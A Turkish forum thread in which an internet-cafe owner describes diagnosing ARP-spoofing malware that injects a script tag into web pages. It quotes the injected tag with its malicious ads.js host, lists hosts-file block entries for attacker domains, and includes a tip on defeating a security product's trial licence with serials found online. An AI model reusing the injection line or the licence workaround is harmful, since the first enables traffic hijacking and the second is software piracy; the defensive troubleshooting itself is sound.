Int. Cafelerde virus

[EdiMax]

Herkese selamlar
Foruma kaydolali sanirim 2 hafta olmustur.
Gercekten hosuma gitti, kendi dertlerime care ararken tesaduf Google'de buldum ve bir aydan beri konulari takip etmeye basladim.
Umarim boyle devam eder, Turkiye'de gercekten bilgiye ihtiyac var ve Ingilizcenin yetersiz kaldigi yerde insan mecbur turkce sitelere donuyor, fakat detayli ve ayrintili bilgi bulmak zordur.
Genelde yuzeysel bilgiler ile gecistiriliyor hersey, ozellikle sistem muhendisligi konularinda bilgi bulmak cok zor.

Gelelim anlatmak istediklerime:
Basit olarak anlatacam, fazla teknik terim kullanmadan.
Corlu'da Internet Cafe isletiyorum.
Bilgisayar konularinla alakasi olanlar bilir ki genelde cafelerde sistem duzenli hale geldikten sonra (tum programlar, oyunlar ve ayarlari) yazilimla (DeepFreeze, Winrolback, ShadowUser) sistem sabitleniyordu :-)
Bende bu sekilde bilgisayarlarimi guvenli diye saniyordum, degisik zararlilarin bulasma ihtimali yok diye.
Bir bucuk ay once basladi cesitli sorunlar bende.
Bilgisayarlar donmaya basladi, bazen pencerenin birinde yazi yazabilirken, diger uygulamanin penceresinde yazamiyordun.
Multiplayer oyunlarda kopmalar basladi.
Tum sistem allak bullak olmustu. Musteriler sikayetci olmaya basladi, ikide bir blg. degistirmeye, ama nafile, gectikleri diger blg.da da belirli sure sonra ayni sorunlar ortaya cikiyordu.
Anladim ki bilgisayarlarima bir sekilde virus bulasmis ve temizlenmesi gerekiyor.
Online oyunlari guncellemek icin cafede musteri varken bilgisayarin birini korumasini gecici kaldirip isimi bitirdikten sonra tekrar eski haline getiriyordum (korumayi devreye sokuyordum). O yuzden dedim ki ben guncellerken agya virus bulasmis, musteriler dikkat etmez ki girdikleri sitelere (nasılsa para oduyorum ;-) diye ), o arada guncelledigim blg.ra yerlesmis.
Basladim bilgisayarlarima teker teker antivirus programi kurup taramaya.
Bu zamana kadar NOD32 kulaniyordum ve memnundum.
Bir taraftanda olaylari degerlendirmeye calisiyordum.
Neden birden tum bilgisayarlarda virus meydana cikti, neden su ana kadar birsey yokken bir gunde hersey allak bullak oldu.
Sehirdeki diger tanidik arkadas kafecilerle gorustum, bazilari biraz sikayet etmeye basladi, fakat benim gibi buyuk olcude degil.
O zaman internette arayayim dedim, nasilsa sinirsiz bilgi kaynagi.
Ve o zaman anladim ki Turkiyenin cogu yerinde kafeciler boyle bir sorunla karsilasmis, herkes degisik tavsiyelerde bulunuyor.
Okuyordum, artik millet care bulamayinca hurafeler uydurmaya baslamis.
Bizim IP'ler sabitlendi, o yuzden sadece sadece sabit IP'lere virus bulasiyormus (Internetteki sanirim bilgisayarlarin %50'si sabit IP'le), BIOS'a yaziyormus kendini, HDD Master Boot sector'e v.s.
www.internetcafeciler.net - burada daha cok ve baska sitelerde de bu sekilde bilgiye rastlamak mumkun.
Bende ne yapacagimi bilemiyordum, genelde en agir basan cozum format atmakti, fakat bendeki bilgisayarlarin anakart cesitliligini goz onunde bulundurarak (25 bilg.dan 15 degisik konfigurasyon vardi)
Bu da cafenin en az 10 gun kapali kalmasina ve herseyi yeniden kurmam gerekiyor anlamina geliyordu (tum programlar, ayarlar, oyunlar ve guncellemeleri), benzer konfigurasyonlari da klonlamak mumkundu
Bu arada antivirus programlarinin ozelliklerini incelemeye basladim, hangisi daha iyi tarama gerceklestiriyor (turkce ve yabanci sitelerde).
NOD32 ile bilgisayarlarimi taradıktan sonra ve bulduklarini sildikten sonra yerine yerlestirip hazır diye rahatliyordum.
Fakat sorunlar hala devam ediyordu agda, hic bir farklilik yoktu.
Tekrar aldim bir bilgisayar ve Avira Antivir Personel kurdum, 6 ay guncelleme yapiyor ve tum gorevlerini yerine getiriyor diye.
Bilgisayar hakkinda ne desem, icinde degisik virusler, trojanlar ve zararli cookie'ler buldum.
Anladim ki tum bilgisayarlari antivirus programinla taratmam lazim, bir gece sabahladim isyerinde, hepsine Avira kurdum.
Ertesi gun emin sekilde cafeyi actim, musteriler gelince yine sorunlar cikmaya basladi, bu defa Avira virus buluyordu ve hemen ekrana seceneklerle bir pencere cikiyordu.
Silme, karantinaya alma v.s., sil deyince belirli sure sonra yine cikiyordu (maalesef Avira Personel edition otomatik silme secenegi sunmuyor - Premiuma gecmek gerek), ben ise emindim bilgisayarlari tamamen temizledim diye.
Musteri bundan daha rahatsız olmaya basladi, ama en azindan makinelerde kilitlenme ortadan kalkti.
Is beni beklediginden yeni arastirmala girdim, bu arada cafedeki bilgisayarlari da gozluyordum.
Gordum ki bazi bilgisayarda hic donma sorunu yok, hatta antivirus programi uyari bile vermiyor.
Oyun oynarken antivirus uyari vermiyor, fakat musteriler internet sayfalarinda dolasirken her yeni acilan pencerede uyari vermeye basladi.
Sabahlari antivirus fazla uyari vermezken, aksamlari cildiriyordu.
Dolayisiyla Kaspersky 7.0.115 TR indirdim ve basladim bilgisayarlara kurmaya (Bir aylik trial fakat tum islevlerini yerine getiriyor ve ayarladiktan sonra otomatik virusleri siliyordu)
Bu sure icerisinde elbet bir yerden care bulup bilgisayarlarimi temizlerim umuduyla.
Kendi kendime diyordum ki, eger virus ya da trojan varsa, bilgisayarin birinde (birkacinda) var, ne zaman o blg. acilsa o zaman aga yayiliyor (ama nasil ve hangi bilgisayalarda var?)
Internette arastirmalarimda farkına vardım ki en fazla internet cafeler bu olaydan sikayetci, ofis aglarindan pek sikayetci yoktu.
Oyunlarin cracklerinde ;-) olabilir dedim, ya da online oyunlardan dolayi.
Bu yuzden dolayi spyware ve trojan programlarinla da tarama yapayim dedim.
Birkac tane denedikten sonra sonunda PC TOOLS Spyware Doctor indirdim, konusunda en iyi (yabanci sitelerin karsilastirmalarina bakarsaniz)
Tarattigimda degisik zararlirar buldu, Avira ve Kaspersky'nin bulamadiklarini, hemde yuksek seviyede zararlilar.
Fakat program trial oldugu icin sadece buluyor, ama silmiyor. Bizim turk insani herseye care bulur, Google arastirirsak, oradan cikar.
Islem su, trial kur, guncellemeleri kendisi yapiyor zaten. Guncelleme bitikten sonra aga kablosunu cikar, buldugun seriallerle kaydol, tarat ve temizlemeye basla.
Gerekirse iki defa tarat, hele full verirsen HDD'ye bagli olarak 12 saat bile surer, ne buldu ise sil. Aga kablosunu taktiktan sonra otomatikman lisansi deaktive ediyor.
Anladim ki su ana kadar benim sistemimin bilgisayarlari tamamen guvenlikten yoksunmus, hele DOCTUS'da Rustock.C ile bilgileri okuduktan sonra :-)
Olaylarin basladigindan 3 hafta gecmisti, hala care yoktu, kimse de kafama yatacak cozum vermiyordu.
Okudugum herseyi deniyordum, online virus scan yaptım, HiJack ile tarattim sistemleri, okudugum herseyi deniyordum, bu arada SP3 cikti Windows XP icin, onu kurdum duzelir umuduyla.
Yok, yok yok!!!
Sistem calisiyor, donmalar kalkti, fakat agda hala virus var, arasira internetten kopmalar oluyor.
Musteri internete Explorer ile baglandiginda hemen virus uyarisi geliyordu, hemen ardindan ayni bilgisayarda Firefox'la deniyordum, bir sorun cikmiyordu.
Bu da bir bilgi idi, Explorer'in bir acigini kulaniyordu zararli.
İlk zamanlar bir siteden "root.51113.com" gif uzantili dosya cekiyordu, antivirus siliyordu.
Host dosyasina su satirlari girdim (arastirirsaniz daha cok domain adresi var internette)
127.0.0.1 web.w3cpublic.cn
127.0.0.1 root.51113.com
Bu kesildi, baska basladi
"http://g.asdafdgfgf.com/ads.js" - ya da benzeri siteden zararli JAVA script iniyordu bilgisayara, Kaspersky antivirus isini duzgun yapiyor, otomatik siliyordu.
Fakat bu da cozum degildi, hala gerekli bilgiyi bulamamistim, kilitlenme ortadan kalkti, fakat virus uyarilarindan dolayi musteri sayisi baya azaldi :-(
Bilgisayarlar temiz gozukuyor, neyle taratmadim ki, her turlu zararli dosyayi sildim, hele bilgisayarin birinde Alman virusu cikti, tam bela, tum EXE dosyalarina bulasiyor ve temizlenmiyor, en iyisi EXE'leri silmek karantinaya almadan.
Bu arada bazi sitelerde basladi biraz bilgiler cikmaya, ofis bilgisayarlarinda da ayni sorunlar olusmaya.
Bir yerde okudum ki bir siteye baglandiginda sayfanin kaynagina baktigimizda en basta <SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT> su satir cikiyor diye.
Kontrol ettim, bende de ayni olay, super guvenilir sitelere bile girsem bu satir cikiyor.
Demek bu satir sitedeki sayfadan degil, benim bilgisayardan, birsey aktif oluyor ve her internet sayfasinin basina bunu ekliyor, antivirus SCRIPTI zararlı buluyor ve siliyor, asil SCRIPTI indirmeye neden olan seyi bulamiyor.
Demek bu zararli benim bilgisayarlarima coktan bulasti, onceden o siteden veya benzeri sitelerden "ads.js" dosyasinin ici bostu, bilgisayara inse de zarar vermiyordu.
Birgun bu sistemi kuranlar zararliyi belirli sayida bilgisayara bulastirdiklarina inandilar ve bu defa inen dosyasinin icine zararli kodlar yazmaya basladilar.
Bizim sistemler pes etti (adamlar isini iyi yapmisti)
Artik birbucuk ay gecmisti, Kaspersky'nin bir aylik suresi dolacak, o zaman iyicene afallayacaktim.
Boyle internette dolasirken bir yerde ARP Spoofing diye okudum, sonra bir sitede Hindistan'da bir ISP'nin musterileri bendeki olayi yasamislar ogrendim.
"http://netoptima.in/arprotect/" - bu siteyi buldum, anlattıklari ayni benim yasadiklarimdi.
Haril haril ARP Spoofing nedir diye arastirmaya basladim, cunku buldugum sitedeki yazilanlar tam benim yasadiklarim gibi, fakat bana nasil faydasi olacakti.
Zaten sayfanin icinde gerekli linkler de verilmisti :-)
ARProtect programini indirdim (program ucretsiz) bir bilgisayara kurdum izlemeye basladim agi, fakat aksam saati idi, tum cafe bilgisayarından epey paket geliyordu, cozmek mumkun degildi.
Izlemeyi biraktim, kafeyi acip sabah programi calistiracaktim ve gun boyu izleyecektim.
ARP Spoofing nedir:
Verdigim linkte cok guzel aciklanmis, fakat ingilizce :-(
Google yok mu, her derde deva, turkce sitelerde arastrdim.
Ve neler ogrendim neler.
Benim anladigim sekilde olayi anlatayim:
Bilgisayarlar aralarinda isletim sistemine gore belirli bir protokolle haberlesiyor.
O protokol paketleri tasiyor, fakat bilgisayarlar aga karti yardimiyla isletim sistemine aktariyor bilgileri aktariyor.
Farkli isletim sistemlerinde bilgileri tasimak icin farkli protokoller vardir, fakat fakat hepsi bunu aga karti sayesinde yaparlar.
O aga kartinina da fabrikada daha imalatinda gercek bir adres kaydedilir (MAC adres), her aga kartinin farkli, ureticiler bunu cok onceden anlasilip belirlemisler, kimse baska ureticinin MAC adresi havuzundan kendi kartina adres belirleyemez.
Yani simdi biz ag karti fabrikasi kurup da satmaya kalksak, kimse bizden almaz ;-)
Kisacasi bilgisayarlar belirli protokol (IP adresi gibi) ve MAC adresi ile haberlesir (IP adresi MAC adresine ve tersi donusturulur). Bunu ARP protokolu sayesinde yapiyorlar (Burasi cok ONEMLI !!!)
Ufak bir agimiz olsun
"A" bilgisayari - IP No: 192.168.1.2 (ornek olarak)
"B" bilgisayari - IP No: 192.168.1.3 (ornek olarak)
"C" ADSL Modem (Gateway) - IP No: 192.168.1.1 (ornek olarak)
Bunun semasini da bulmak mumkun Google arattirirsan.
Bu iki bilgisayarin internete cikisi nasil oluyor.
"A" bilgisayarindaki musteri acip Exploreri belirli bir siteye girmeye tesebbus ediyor.
Peki nasıl baglanacak, ADSL modem uzeririnden (yani 192.168.1.1 adresten)
Bu adres ya elle girilir (ki daha saglikli), ya da otomatikman dagitilir (ADSL modemlerde var boyle bir ozellik)
Simdi "A" bilgisayarinda internete cikis adresi kayitli oldugu icin aga mesaj atiyor "192.168.1.1" IP adresine sahip cihaz (Modem, Server Blg., Router olabilir) bana MAC adresini bildirsin de haberleselim, bende musterimi internetten cektigim datalarla bilgi sahibi yapayim :-)
"C" (ADSL Modemimiz önek) bu mesaji alir almaz geri mesaj atiyor, aradigin cikis kapisi benim, MAC adresim de su.
Bu sekide "A" bilgisayari belirli siteye yonleniyor ve datalarin geri donus sekli de ayni.
Internetten bilgiler ADSL modeme ulasiyor, benden bu bilgileri su "192.168.1.2" IP adresine ait bilgisayar istedi, bana MAC adresini bildirsin de haberleselim diye aga mesaj atiyor.
"A" bilgisayari MAC adresini bildirip bizim musteri de acmak istedigi WEB sayfasi bilgilerine ulasiyor.
Agdaki tum bilgisayarlar bu sekilde internete baglaniyor ya da aralarinda haberlesiyor.
Yani "B" bilgisayari da aynisini yapiyor.
Simdi gelelim ARP Spoofinge.
"B" bilgisayarina bizdeki zararli bulasti.
O zaman ARP protokolu ile "B" bilgisayari agdaki bilgisayarlara mesaj atiyor: "Ben bu agda "Gateway'ım", yani internete cikis isteklerinizi bana gonderin.
"A" (IP No: 192.168.1.2) bilgisayari da buna inanip internete baglanmak istedigi sayfayi "B" (IP No: 192.168.1.3) bilgisayarina iletiyor, "B" bilgisayari da bunu ADSL modem'e (IP No: 192.168.1.1, Gercek cikis kapisina)
Bilgilerin geri donusunu izleyelim.
"C" cihzimiza (ADSL modem) gelen bilgileri yerine teslim etmek icin su IP No: 192.168.1.2 adresine sahip bilgisayar bana MAC adresini bildirsin diye mesaj atiyor, burada "B" (IP No: 192.168.1.3) bilgisayari daha cabuk davraniyor ve diyor ki IP No: 192.168.1.2 bana ait, MAC adresim su diye.
Simdi "C" cihazimiz bilgileri "B" bilgisayarina gonderiyo, orada zararli o bilgilerin basina <SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT> satirini ekliyor ve "A" bilgisayarina teslim ediyor ;-)
"A" bilgisayari alir almaz bilgileri ilk once ilk satiri isletiyor, viruslu dosya da bilgisayara iniyor :-)
O viruslu dosyanin icindeki kod ne ise ona gore degisik belirtiler meydana geliyor bilgisayarda, virus olabilir, keyloger, truva ati v.s.
Biraz olayin icine daha girersek, bilgisayarlar ARP Cache diye bise tutarlar hafizasinda, bunun icinde de Dinamik ve Statik diye bilgiler ikiye ayrilir.
Statik olanlar elle girilir, Dinamik olanlar ise bilgisayar bir bilgisayarla haberlesmeye gecince meydana gelir, yani su IP adresina sahip bilgisayar su Mac adresine sahiptir diye belirli bir sure hafizada tutulur.
Simdi biz bu bilgilerden nasil faydalanacagiz.
Bizim "B" bilgisayarina zararli bulasti.
Aktif oldugunda hemen tum bilgisayarlara mesaj gondermeye basliyor, ben bu agda internete cikis kapisiyim (gateway, yani bizim durumda 192.168.1.1)
Tum bilgileri bana gonderin, bunu belirli araliklarla yapiyor, ARP Cache dinamik bolgede silinmeden once.
O zaman "A" bilgisayari bilgiye ulasmak istediginde ilk once ARP Cache bakiyor "192.168.1.1" IP adresi kime ait diye, aaaa su imis Gateway cikisinin MAC adresi, aga mesaj atmaya gerek yok, hemen gonderiyor istekleri, fakat "B" bilgisayarina.
Bu arada "B" bilgisayarindaki zararli baska mesajlar da atiyor aga, ben IP No: 192.168.1.2, IP No: 192.168.1.3, IP No: 192.168.1.4 ...... ve devam ediyor
ARP programi ile de bunu tespit ediyoruz, hangi bilgisayardan devamli mesaj geliyorsa, ona bulasmistir.
Yani herturlu bilgiyi uzerine cekmeye calisiyor, tum bilgi uzerinden geciyor (Proxy), hepsine de kodu yerlestiriyor.
O yuzden agda IP cakismalari basliyor, bilgisayarlarda baglantilar kopuyor v.s.
Zararli bulasan bilgisayar da kapatildiginda diger bilgisayarlarin belirli bir sure icin internet baglantisi kesiliyor, kopmalar oluyor.
Programin kullanimi basit, indir ve kur, kurduktan sonra restart istiyor.
Sadece bir bilgisayara kurdum, yetiyor ;-)
Sabah geldigimde calistirdim programi.
Arastirmalarimda baska program da buldum:
"http://www.antiarp.com/English/e_index.htm"
Bu program daha iyi, cok daha fazla secenek var, fakat ucretli.
Yine de 15 sure ile kullanabilirsin, bu da yeter ve artar :-)
Ben ikisini de ayni anda calistirdim, bir sorun yok.
Hem daha emin oldum sonuclardan.
Bende iki bilgisayar cikti simdilik.
Onlari agdan kestim, fakat olay devam ediyor, yarin tekrar izleyecem agi.
Sanirim simdilik bendeki durum aga yayildigindan, eger yarin sorun yoksa, demek atlattim bu olayi :-))))))
Eger cikarsa, en fazla bir veya iki bilgisayarda daha olur.

Belki biraz karisik anlattim olayi.
Ama bir bucuk ayda cektiklerimi anlatmaya calistim, uykusuz geceleri, problemleri ve sikintilari.
Umarim birisinin isine yarar.
Teknik konulari sitedeki adminler daha iyi yazabilir
Herkese kolay gelsin, virussuz gunler dilerim :-)

[by_YP]

Merhaba hoşgeldiniz.
ilk mesajınızı da böyle güzel bir konuda yazdığınız için tşk ederim. eminim çoğumuzun işine yarayacaktır verdiğiniz bilgiler.

[cengizhan01]

hoşgeldiniz ve bu güzel yazı için teşekkürler...

[passoturko]

Doctus'a hoşgeldiniz yazı için teşekkürler...
Tarayıcı ayarlarınızı (IE 6-7) sıfırlamayı denemeniz tavsiye.
Denetim Masası/Internet Seçenekleri/Gelişmiş/Sıfırla

Ayarları sıfırladıktan sonra tarayıcı eklentileri devre dışı kalacaktır.Eklentileri tekrar aktif hale getirmek için
Denetim Masası/Internet Seçenekleri/Programlar/Eklentileri yönet

[asi_itaatkar]

Çok geniş bir şekilde yaptığın ve bize sunduğun araştırma için teşşekür ederim.Bende bir kafeciğim ve aynı sorunlar bendede var.Yağtığın araştırmaları bende dikkate alıcam tekrardan teşekkürler

[Blick]

yazı için sağol arkadaşım memleketlim :p:
aynı sorunlan bizde karşılaşıyoruz çok işimize yarayacak ;)

[mehmet57]

Çok teşekkürler çok güzel bilgi bunlar

[snrzkn]

teşekkürler çok işe yarayacak bir bilgi

[By_Kalpsiz]

Aynı Sorunlar var bendede deep sızıntımı veriyor diyordum 2. seçenek ag virüsü bilgisayar açıldıktan sonra diyordum demek ag virüsü var bende kafe teknik servisine bakıyorum ghost ata ata bi hal oldum artık bilgisayarlara nod32 + firiwall kuracaktım dediğini deneyecem yarın sabah üstad Allah razı olsun çözüpte kenara çekilmemişsin ben gibi kardeşlerinide düşünmüşsün çok sinir bozucu ve yorucu bir olay virüs=(

[Felâsife]

10. mesajdan sonrası buraya yeni bir konu olarak taşınmıştır.